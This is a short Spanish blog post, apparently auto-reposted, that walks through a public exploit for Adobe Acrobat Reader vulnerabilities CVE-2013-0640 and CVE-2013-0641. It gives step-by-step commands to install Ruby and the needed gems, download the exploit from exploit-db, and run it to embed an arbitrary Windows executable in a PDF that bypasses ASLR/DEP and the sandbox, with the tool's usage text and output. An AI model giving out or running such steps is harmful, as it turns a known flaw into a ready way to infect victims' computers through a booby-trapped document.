Hoy, las dos vulnerabilidades ya tienen su CVE asignado (CVE-2013-0640 y CVE-2013-0641) y @w3bd3vil y @abh1sek han rescatado de un foro ruso y adaptado un exploit que es capaz de evadir ASLR/DEP y el sandbox de la aplicación.
Afecta a las versiones 11.0.1, 11.0.0, 10.1.5, 10.1.4, 10.1.3, 10.1.2, 10.1 y 9.5 de Adobe Acrobat Reader y funciona bajo Windows 7 (32 y 64bit) y XP.
Para probarlo nada más sencillo. Primero necesitamos instalar Ruby 1.9 (http://dl.bintray.com/oneclick/rubyinstaller/rubyinstaller-1.9.3-p484.exe?direct) y las gemas origami y metasm:
d:\Ruby193\bin\gem.bat install metasm
d:\Ruby193\bin\gem.bat install origami -v "=1.2.5"
Luego descargamos el exploit (http://www.exploit-db.com/sploits/29881.tar.gz) y lo descomprimimos, lo desempaquetamos y echamos un vistazo a sus parámetros y uso:
D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb
Usage: xfa_MAGIC.rb [options]
-i, --input [FILE] Input PDF. If provided, exploit will be injected into it (optional)
-p, --payload [FILE] PE executable to embed in the payload
--low-mem Use Heap spray suitable for low memory environment
-o, --output [FILE] File path to write output PDF
-h, --help Show help
Después simplemente seleccionamos nuestro ejecutable PE para el payload (máximo 114688 bytes) y el nombre del fichero PDF:
D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb -p prueba.exe -o poc.pdf
[+] Loading package
[+] Embedding user executable (size: 18944)
[+] Encoding payload (key: 249 kii: 251)
[+] Generating file: poc.pdf
Buen fin de semana y happy hacking!
View the original article here
This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.
No hay comentarios:
Publicar un comentario